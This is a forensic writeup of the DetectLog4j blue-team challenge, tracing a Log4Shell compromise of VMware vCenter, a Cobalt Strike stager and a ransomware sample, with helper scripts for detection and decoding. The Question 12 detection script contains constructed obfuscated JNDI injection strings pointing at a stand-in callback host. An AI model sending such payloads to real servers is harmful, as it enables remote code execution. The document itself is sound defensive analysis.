# DetectLog4j

Hey everyone.

This writeup covers the challenge DetectLog4j from Cyberdefenders.org (<https://cyberdefenders.org/blueteam-ctf-challenges/86>). The challenge focuses on disk forensics based on a provided .E01 disk image.

I used Autopsy, Registry Explorer and a few other tools (mentioned under the relevant questions) to solve the questions of this challenge. In general, I don’t want to just click buttons and see the solution, but also understand where to find certain information on the provided image.

For more information about Log4Shell, I suggest watching the video and PoC by John Hammond on YouTube (<https://www.youtube.com/watch?v=7qoPDq41xhQ>).

***

## **Question 1: What is the computer hostname?**

First, I imported the provided disk image into Autopsy. To answer the first question, I looked at the operating system information that Autopsy extracts.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*o034xbcIkmoCYhjiGmRhUA.png" alt="" height="96" width="700"><figcaption></figcaption></figure>

This was quick and easy, but since I want to learn new techniques and tools, I was not really happy with this solution. So I researched where the hostname of a computer is stored and found that I had to look for the *ComputerName* key within the *SYSTEM* registry hive. To do this, I exported the hives with Autopsy, loaded the SYSTEM hive into Registry Explorer and searched for the relevant key.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*cXvW6Pv81oRzmlf2Nh3_rQ.png" alt="" height="171" width="700"><figcaption></figcaption></figure>

## **Question 2: What is the Timezone of the compromised machine?**

To answer this question, I used the previously exported SYSTEM registry hive and Registry Explorer again, this time searching for the word *timezone*.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*Xii9wcbvxoNYHGUfOl_ykA.png" alt="" height="117" width="700"><figcaption></figcaption></figure>

I found the value of the corresponding registry key, but I had to translate it into a UTC (Coordinated Universal Time) offset.

## **Question 3: What is the current build number on the system?**

A quick Google search showed that I had to look at the *CurrentVersion* key within the *SOFTWARE* registry hive. The value named *BuildNumber* is located under the key path *SOFTWARE: Microsoft\Windows NT\CurrentVersion*.

<figure><img src="https://miro.medium.com/v2/resize:fit:578/1*Bq8kZOOAByfdiK8gHecEqA.png" alt="" height="187" width="578"><figcaption></figcaption></figure>

## **Question 4: What is the computer IP?**

Again, a quick Google search told me to look under this path:

> SYSTEM: ControlSet001\Services\Tcpip\Parameters\Interfaces\\

The subkeys within this path describe each adapter for the corresponding machine.

<figure><img src="https://miro.medium.com/v2/resize:fit:446/1*8BEHBnUHR4nsqR9_SDfueg.png" alt="" height="41" width="446"><figcaption></figcaption></figure>

## **Question 5: What is the domain the computer was assigned to?**

I found the answer within the following path:

> SYSTEM: ControlSet001\Services\Tcpip\Parameters

<figure><img src="https://miro.medium.com/v2/resize:fit:449/1*dLzlq-kxHKXkgQJqrLGjkQ.png" alt="" height="18" width="449"><figcaption></figcaption></figure>

## **Question 6: When was myoussef user created?**

My first thought was to look through the *C:\Users* directory within the provided disk image. Unfortunately, there is no profile for the user *myoussef* in this directory.

<figure><img src="https://miro.medium.com/v2/resize:fit:207/1*I7UmDs3wB_n50t0YrW-g7w.png" alt="" height="268" width="207"><figcaption></figcaption></figure>

It could be that *myoussef* is a domain user account named according to the pattern first letter of the first name (m) plus surname (youssef).

I decided to dump the *SAM* hive.

> This hive is the Security Account Manager and contains various information about the user accounts that log on to the system.

With Registry Explorer I clicked through the hive and found interesting information in the following path:

> ROOT\SAM\Domains\Account\Users

Here I found information about many more accounts than within the C:\Users directory, *myoussef* included. I filtered for this account and found the right answer.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*1Lbci6j-GonRf2hbJLrriw.png" alt="" height="55" width="700"><figcaption></figcaption></figure>

## **Question 7: What is the user mhasan password hint?**

The solution can be found with the method described in Question 6.

## **Question 8: What is the version of the VMware product installed on the machine?**

With Registry Explorer I searched for *vmware* and clicked through the results, until I found the key path:

> ROOT\Microsoft\Windows\CurrentVersion\Uninstall\VMware-VCS

with the subkey *DisplayVersion*.

<figure><img src="https://miro.medium.com/v2/resize:fit:234/1*yW3y7OuGc7eKzB1f0fQ-Qg.png" alt="" height="16" width="234"><figcaption></figcaption></figure>

## **Question 9: What is the version of the log4j library used by the installed VMware product?**

I used the keyword search option of Autopsy to search for a specific keyword (here: log4j). The global search returned around 940 hits across the whole disk image. Within these results, I searched manually for .jar files.

<figure><img src="https://miro.medium.com/v2/resize:fit:163/1*wZIx6bzMeFQ1Afb9FaSLnA.png" alt="" height="129" width="163"><figcaption></figcaption></figure>

## **Question 10: What is the log4j library log level specified in the configuration file?**

Based on a Google search, I found out that the log4j configuration can be stored in an .xml file. I refined my search query (RegEx) and found the correct .xml file.

<figure><img src="https://miro.medium.com/v2/resize:fit:273/1*bS0tpbBUuCMy1I89iiCa9w.png" alt="" height="259" width="273"><figcaption></figcaption></figure>

## **Question 11: The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?**

The answer cannot be found within the disk image, so I googled how Log4Shell is exploited against VMware vCenter. This link helped me:

> <https://thestack.technology/vmware-log4j-exposure-attack-log4shell/>

## **Question 12: The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?**

Based on my research for the previous task, I came across a log file that gives the answer (audit\_events.log). This file contains various attempts involving *log4shell.huntress.com*. In addition, it shows how the exploit, or rather the command used for exploitation, can be obfuscated.
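The obfuscation mentioned above works because Log4j 2 evaluates nested lookups (`${lower:j}`, `${upper:j}`, and the default-value form `${::-j}`) before it ever sees the word `jndi`, so a plain string match on `${jndi:` misses most real attempts. As an added example that is not part of the original writeup, the following script normalises those wrappers (and URL encoding) the same way Log4j would and only then checks for a JNDI lookup. The log lines are constructed in the spirit of audit\_events.log; they are not the challenge's real entries, and the addresses are documentation (TEST-NET) ranges.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one that contains no further '${' inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A fully normalised JNDI lookup: ${jndi:<protocol>:...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve_wrapper(match):
    """Collapse the wrappers Log4j 2 would evaluate before 'jndi' is visible.

    ${lower:X} / ${upper:X} change case, and ${anything:-X} (including ${::-X})
    is the default-value syntax, which yields X. A ${jndi:...} lookup itself and
    any unknown lookup are left untouched so the indicator survives normalisation.
    """
    token = match.group(1)
    name, sep, arg = token.partition(":")
    if name.strip().lower() == "jndi":
        return match.group(0)
    if ":-" in token:
        return token.split(":-", 1)[1]
    if sep and name.lower() == "lower":
        return arg.lower()
    if sep and name.lower() == "upper":
        return arg.upper()
    return match.group(0)


def normalize(value: str, max_rounds: int = 20) -> str:
    """URL-decode, then repeatedly resolve innermost wrappers until nothing changes."""
    value = unquote(value)
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve_wrapper, value)
        if resolved == value:
            break
        value = resolved
    return value


def scan(lines):
    """Return (line_index, protocol, normalised_line) for every line carrying a JNDI lookup."""
    findings = []
    for idx, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if m:
            findings.append((idx, m.group(1).lower(), norm))
    return findings


# Constructed sample lines (not the challenge's real log).
CONSTRUCTED_LOG = [
    '2021-12-12T10:00:01 login failed user="admin" ua="Mozilla/5.0 (constructed)"',
    '2021-12-12T10:00:05 login failed user="${jndi:ldap://192.0.2.5:1389/a}"',
    '2021-12-12T10:00:09 login failed user="${${lower:j}ndi:ldap://192.0.2.5:1389/b}"',
    '2021-12-12T10:00:14 login failed x-api-version="${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://192.0.2.5:1389/c}"',
    '2021-12-12T10:00:20 login failed user="%24%7B%24%7Bupper%3Aj%7Dndi%3Adns%3A%2F%2F192.0.2.5%2Fd%7D"',
]

if __name__ == "__main__":
    for idx, proto, norm in scan(CONSTRUCTED_LOG):
        print(f"line {idx}: jndi via {proto}: {norm}")
```

Only the first constructed line stays clean; the other four resolve to a `${jndi:ldap:...}` or `${jndi:dns:...}` lookup, which is the form worth alerting on and pivoting from (the embedded host is the callback server to hunt for in other logs).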

## **Question 13: When was the first successful login to vsphere WebClient?**

Like in Question 12, I used the audit\_events.log file to answer this question.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*sDJGiUEy6kBQF5P1SGJwdQ.png" alt="" height="20" width="700"><figcaption></figcaption></figure>

Keep in mind to convert the given PST timestamp into UTC.
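Both Question 2 (reading the timezone from the SYSTEM hive) and this question (converting a PST log timestamp to UTC) come down to the same sign convention, which is easy to get backwards: Windows defines `UTC = local time + Bias`, so `Bias = 480` means UTC-08:00, and a negative bias such as UTC+01:00 is stored as the unsigned DWORD `0xFFFFFFC4`. The following helper is an added example, not part of the original writeup; the bias values in it are constructed, not the challenge's.

```python
from datetime import datetime, timedelta, timezone

# The values live under SYSTEM\ControlSet001\Control\TimeZoneInformation on an offline hive
# (ControlSet001 is usually the current control set; Select\Current confirms it).
# Bias: standard offset in minutes. ActiveTimeBias: the offset currently in force, DST included.


def dword_to_signed(value: int) -> int:
    """Registry DWORDs are displayed unsigned; Bias is a signed LONG, so 0xFFFFFFC4 means -60."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


def utc_offset_label(bias: int) -> str:
    """Turn a raw Bias/ActiveTimeBias DWORD into a label such as 'UTC-08:00'."""
    minutes = -dword_to_signed(bias)          # UTC = local + Bias  =>  offset = -Bias
    sign = "+" if minutes >= 0 else "-"
    hours, mins = divmod(abs(minutes), 60)
    return f"UTC{sign}{hours:02d}:{mins:02d}"


def bias_to_tzinfo(bias: int) -> timezone:
    return timezone(timedelta(minutes=-dword_to_signed(bias)))


def local_to_utc(local_ts: str, active_time_bias: int, fmt: str = "%Y-%m-%dT%H:%M:%S") -> str:
    """Re-express a local log timestamp (e.g. from audit_events.log) in UTC, ISO format with Z."""
    naive = datetime.strptime(local_ts, fmt)
    aware = naive.replace(tzinfo=bias_to_tzinfo(active_time_bias))
    return aware.astimezone(timezone.utc).strftime(fmt) + "Z"


# Constructed sample values (not the challenge's real ones).
PST_BIAS = 480               # Pacific Standard Time: UTC = local + 8h
CET_BIAS_RAW = 0xFFFFFFC4    # -60 minutes (UTC+01:00) as it appears as an unsigned DWORD

if __name__ == "__main__":
    print(utc_offset_label(PST_BIAS), utc_offset_label(CET_BIAS_RAW))
    print(local_to_utc("2021-12-12T23:30:00", PST_BIAS))
```

Use `ActiveTimeBias` rather than `Bias` when converting timestamps from a period in which daylight saving time was in force; for a December timestamp in the Pacific zone both are 480.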

## **Question 14: What is the attacker’s IP address?**

Again, this information can be found in the above-mentioned log. Search for suspicious-looking events and failed logins.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*SHmjHe9KtmzP6gH8OSjQZw.png" alt="" height="35" width="700"><figcaption></figcaption></figure>

## **Question 15: What is the port the attacker used to receive the cobalt strike reverse shell?**

This is a tough question in my opinion, and it requires several steps to get to the answer.

At first I thought about looking for network connections to the attacker’s IP address on the disk image, so I exported various Windows event logs and analyzed them with Hayabusa and Timeline Explorer, but I couldn’t find anything useful about that.

But in one of the logs (PowerShell Operational) I found a very suspicious-looking base64-encoded string.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*iBO7dGWtKrTzGgXr5R18Jg.png" alt="" height="190" width="700"><figcaption></figcaption></figure>

It looks like the string is base64-encoded gzip data. I used CyberChef with the *From Base64* and *Gunzip* recipes and got interesting code.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*g8yNXup2JkwFQsSYF15h0A.png" alt="" height="394" width="700"><figcaption></figcaption></figure>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*M0yQzo9jqXJMwTrbWhdTAA.png" alt="" height="333" width="700"><figcaption></figcaption></figure>

I copied this code into a new .ps1 file and tried to analyze it. Line 27 contains another suspicious base64-encoded string. Again, I decoded it, but within the garbage I only saw the attacker’s IP address and some pieces of a User-Agent, not the port.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*l6vFc8s0oq69sOXadnQf1g.png" alt="" height="223" width="700"><figcaption></figcaption></figure>

So I had to run this script on my virtual machine, with FakeNet running to observe the traffic. In the output, I searched for *powershell.exe* and noticed the correct port; the attacker’s IP address and the User-Agent showed up in the output too.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*bQM8Z-B3xg1MPQyfL_SeaA.png" alt="" height="251" width="700"><figcaption></figcaption></figure>
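The layering seen here (base64 around a UTF-16LE `-EncodedCommand`, then base64 around gzip, then one more base64 literal inside the script) is common enough that it pays to peel it mechanically before deciding whether detonation in a sandbox is needed at all. The script below is an added example and not part of the original writeup; it follows the longest quoted base64 literal from one layer into the next and pulls network indicators out of the decoded text without executing anything. The three-layer sample is constructed inline (TEST-NET address, made-up User-Agent) so it runs offline.

```python
import base64
import binascii
import gzip
import re
from typing import List, Optional

GZIP_MAGIC = b"\x1f\x8b"
B64_ALPHABET = re.compile(r"[A-Za-z0-9+/=\s]+")
# A quoted base64 literal inside a script, e.g. FromBase64String('....')
EMBEDDED_B64 = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")


def try_base64(text: str) -> Optional[bytes]:
    """Decode only if the whole string is plausible base64; otherwise return None."""
    text = text.strip()
    if len(text) < 16 or not B64_ALPHABET.fullmatch(text):
        return None
    try:
        return base64.b64decode(text)
    except (binascii.Error, ValueError):
        return None


def to_text(raw: bytes) -> str:
    """Gunzip if needed, then decode: -EncodedCommand payloads are UTF-16LE, later stages usually ASCII."""
    if raw.startswith(GZIP_MAGIC):
        raw = gzip.decompress(raw)
    if len(raw) >= 2 and raw[1] == 0:      # ASCII text encoded as UTF-16LE has NUL high bytes
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def peel(blob: str, max_depth: int = 5) -> List[str]:
    """Decode layer after layer, following the longest embedded base64 literal each time."""
    layers = []
    current = blob
    for _ in range(max_depth):
        raw = try_base64(current)
        if raw is None:
            break
        text = to_text(raw)
        layers.append(text)
        embedded = EMBEDDED_B64.findall(text)
        if not embedded:
            break
        current = max(embedded, key=len)
    return layers


def extract_iocs(layers: List[str]) -> dict:
    """Pull network indicators out of all decoded layers (static, nothing is run)."""
    joined = "\n".join(layers)
    return {
        "ipv4": sorted(set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", joined))),
        "urls": sorted(set(re.findall(r"https?://[^\s'\"]+", joined))),
        "user_agents": sorted(set(re.findall(r"Mozilla/[^'\"\r\n]+", joined))),
    }


# Constructed three-layer sample, built here so the demo is self-contained.
STAGE2 = b"$ua='Mozilla/5.0 (constructed sample)'; $u='http://192.0.2.10:8443/index.html'"
STAGE1 = b"$d=[Convert]::FromBase64String('" + base64.b64encode(STAGE2) + b"')  # constructed"
OUTER = ("$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('"
         + base64.b64encode(gzip.compress(STAGE1)).decode() + "'))")
SAMPLE_ENCODED_COMMAND = base64.b64encode(OUTER.encode("utf-16-le")).decode()

if __name__ == "__main__":
    found = peel(SAMPLE_ENCODED_COMMAND)
    print(f"{len(found)} layers decoded")
    print(extract_iocs(found))
```

When the innermost layer is raw shellcode rather than script text, as in this question, the port usually sits in a binary field instead of a printable string, which is exactly why the static pass above finds the IP and User-Agent but the port still needs a sandbox run with FakeNet or a disassembler.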

## **Question 16: What is the script name published by VMware to mitigate log4shell vulnerability?**

I searched with Google for the correct answer within a knowledge base article from VMware.

## **Question 17: In some cases, you may not be able to update the products used in your network. What is the system property needed to set to ‘true’ to work around the log4shell vulnerability?**

Again, I searched Google with some words of the question and found the answer very quickly.

## **Question 18: What is the log4j version which contains a patch to CVE-2021–44228?**

Again, I searched Google with some words of the question and found the answer very quickly.

## **Question 19: Removing JNDIlookup.class may help in mitigating log4shell. What is the sha256 hash of the JNDILookup.class?**

From the previous questions I know that we are dealing with version 2.11.2 of log4j. On this page

> <https://gist.github.com/xanda/7ac663984f3560f0b39b18437362d924>

I found various hash values of the relevant files.

Another solution would be to export the file *log4j-core-2.11.2.jar*, change the extension to *.zip*, extract the contents and generate the SHA256 hash of *JNDILookup.class*.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*oq6sO95tsY6_xxrbqE02MA.png" alt="" height="31" width="700"><figcaption></figcaption></figure>
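The manual route above (rename to .zip, extract, hash) and the version check from Question 9 can be done in one pass directly on the jar, since a jar is a zip file. As an added example that is not part of the original writeup, the script below reads `Implementation-Version` from the manifest (Maven-built jars normally carry it), reports whether `org/apache/logging/log4j/core/lookup/JndiLookup.class` is present (note the real casing is `JndiLookup`), prints its SHA-256, and can rewrite the jar without that class, which is what Apache's documented `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class` mitigation does. The jar it runs against is a constructed stand-in with placeholder bytes, so the hashes are not the real ones.

```python
import hashlib
import io
import zipfile

# Path of the class inside log4j-core (real casing: JndiLookup).
JNDI_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def inspect_jar(jar_bytes: bytes) -> dict:
    """Report the manifest version plus presence and SHA-256 of JndiLookup.class."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", errors="replace")
            for line in manifest.splitlines():
                if line.startswith("Implementation-Version:"):
                    version = line.split(":", 1)[1].strip()
        digest = hashlib.sha256(zf.read(JNDI_ENTRY)).hexdigest() if JNDI_ENTRY in names else None
    return {
        "version": version,
        "jndi_lookup_present": JNDI_ENTRY in names,
        "jndi_lookup_sha256": digest,
    }


def remove_jndi_lookup(jar_bytes: bytes) -> bytes:
    """Rewrite the jar with every entry except JndiLookup.class (the documented workaround)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename == JNDI_ENTRY:
                continue
            dst.writestr(info, src.read(info.filename))
    return out.getvalue()


# Constructed stand-in for log4j-core-2.11.2.jar: fake manifest, fake class bytes.
FAKE_CLASS = b"\xca\xfe\xba\xbe constructed placeholder, not real bytecode"
FAKE_CLASS_SHA256 = hashlib.sha256(FAKE_CLASS).hexdigest()


def build_sample_jar(version: str = "2.11.2") -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr(JNDI_ENTRY, FAKE_CLASS)
        zf.writestr("org/apache/logging/log4j/core/lookup/DateLookup.class", b"\xca\xfe\xba\xbe other")
    return buf.getvalue()


if __name__ == "__main__":
    jar = build_sample_jar()
    print(inspect_jar(jar))
    print(inspect_jar(remove_jndi_lookup(jar)))
```

On a real image, replace `build_sample_jar()` with the bytes of the exported `log4j-core-2.11.2.jar` and compare the reported hash against a trusted list such as the gist linked above.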

## **Question 20: Analyze JNDILookup.class. What is the value stored in the CONTAINER\_JNDI\_RESOURCE\_PATH\_PREFIX variable?**

I analyzed the file with a Java decompiler (jd-gui).

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*JnzieUn5c088AaGjR0IsQg.png" alt="" height="578" width="700"><figcaption></figcaption></figure>

## **Question 21: What is the executable used by the attacker to gain persistence?**

The attacker used a technique to gain persistence on the compromised machine. One such technique abuses the *RunOnce* registry key.

See the following links:

> <https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys>
>
> <https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/>

So I checked the *NTUSER.DAT* files of the users and noticed something strange in the *NTUSER.DAT* of the user Administrator-WINB633EO9K91M. Under this key path

> ROOT\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

I noticed a suspicious value.

<figure><img src="https://miro.medium.com/v2/resize:fit:558/1*jp5vRwNnzHpsu66vv5uVGg.png" alt="" height="25" width="558"><figcaption></figcaption></figure>

## **Question 22: When was the first submission of ransomware to virustotal?**

I dumped and analyzed the Master File Table (MFT) from the disk image. To be honest, I happened to find a suspicious entry in the root directory of the image with the hash

<figure><img src="https://miro.medium.com/v2/resize:fit:487/1*7W1z_vBy26DCVh3ATePbkQ.png" alt="" height="36" width="487"><figcaption></figcaption></figure>

## **Question 23: The ransomware downloads a text file from an external server. What is the key used to decrypt the URL?**

I extracted the suspicious file and analyzed it with dnSpy. Within the entry point I noticed a suspicious string variable:

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*0D1MoZQ_6KY1HtGb11f05Q.png" alt="" height="129" width="700"><figcaption></figcaption></figure>

## **Question 24: What is the ISP that owns that IP that serves the text file?**

There are two ways to answer this question:

1. Click through VirusTotal to get the relevant information about the contacted domain. The ISP can be read off easily:

<figure><img src="https://miro.medium.com/v2/resize:fit:336/1*PtlDyIF3mpnUhrbUqxr8mA.png" alt="" height="93" width="336"><figcaption></figcaption></figure>

2. All the relevant information is visible in this screenshot:

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*XXzKYpuEmXLimThgSSQI6w.png" alt="" height="129" width="700"><figcaption></figcaption></figure>

The WebClient downloads a file from a URL that is stored as an encrypted string. To decrypt the URL, you have to combine the given elements (red and blue arrows).

I used CyberChef to decrypt the string from the variable *text* with the key stored in the variable *text3*. A lot of malware uses XOR encryption, and in this case the decryption function is implemented in the binary itself:

<figure><img src="https://miro.medium.com/v2/resize:fit:557/1*qA6ZT-Hv8qvtHHy1ek4Wqg.png" alt="" height="254" width="557"><figcaption></figcaption></figure>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*O5i5bpcEWZymQ9Mg_kO_Bg.png" alt="" height="244" width="700"><figcaption></figcaption></figure>

To get the name of the ISP, I used a simple whois.

## **Question 25: The ransomware checks for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?**

The extension check is performed with this piece of code:

<figure><img src="https://miro.medium.com/v2/resize:fit:541/1*4u73RLofItwYwMQbgm48gA.png" alt="" height="441" width="541"><figcaption></figcaption></figure>

Since the question asks for the second extension, I used CyberChef again to decrypt the string in variable *text3*.

<figure><img src="https://miro.medium.com/v2/resize:fit:651/1*39IW1ouNYYskMUkEW4ptSg.png" alt="" height="544" width="651"><figcaption></figcaption></figure>
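The CyberChef recipe used for the URL in Question 24 and for the extension list here is the same repeating-key XOR, so it is worth having it as a script when a sample has more than a couple of encrypted strings. The code below is an added example and not the ransomware's own routine or part of the original writeup; it assumes the encrypted strings are carried as base64 (the exact transport in this sample is not shown on the page) and that the extension list is comma-separated, both of which are assumptions. The key and ciphertexts are constructed by encrypting known plaintext, not taken from the sample. The `key_from_crib` helper goes one step beyond the page: when the key variable is not obvious, XORing the ciphertext with an expected prefix such as `http://` recovers the first key bytes.

```python
import base64


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; XOR is its own inverse, so one routine encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_string(enc: str, key: str) -> str:
    """Assumed layout: base64 transport around the XOR'd UTF-8 bytes."""
    return xor_bytes(base64.b64decode(enc), key.encode()).decode()


def encrypt_string(plain: str, key: str) -> str:
    """Inverse of decrypt_string; only used here to build the constructed sample."""
    return base64.b64encode(xor_bytes(plain.encode(), key.encode())).decode()


def key_from_crib(enc: str, crib: str) -> bytes:
    """Known-plaintext trick: ciphertext XOR expected prefix yields the matching key bytes."""
    data = base64.b64decode(enc)[: len(crib)]
    return xor_bytes(data, crib.encode())


def excluded_extensions(enc: str, key: str) -> list:
    """Decrypt the extension list (comma separator is an assumption) into a Python list."""
    return [e.strip() for e in decrypt_string(enc, key).split(",") if e.strip()]


# Constructed sample: a made-up key and strings encrypted with it (not the sample's values).
KEY = "constructed-key"
ENC_URL = encrypt_string("http://192.0.2.20/constructed.txt", KEY)
ENC_EXTS = encrypt_string(".exe,.dll,.sys,.lnk", KEY)

if __name__ == "__main__":
    print(decrypt_string(ENC_URL, KEY))              # the download URL
    print(key_from_crib(ENC_URL, "http://"))         # first seven key bytes
    print(excluded_extensions(ENC_EXTS, KEY)[1])     # the second excluded extension
```

If the crib check returns bytes that do not look like the key found in dnSpy, the string is either not XOR, uses a different transport than base64, or the plaintext does not start with `http://`; each of those is a useful finding on its own.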
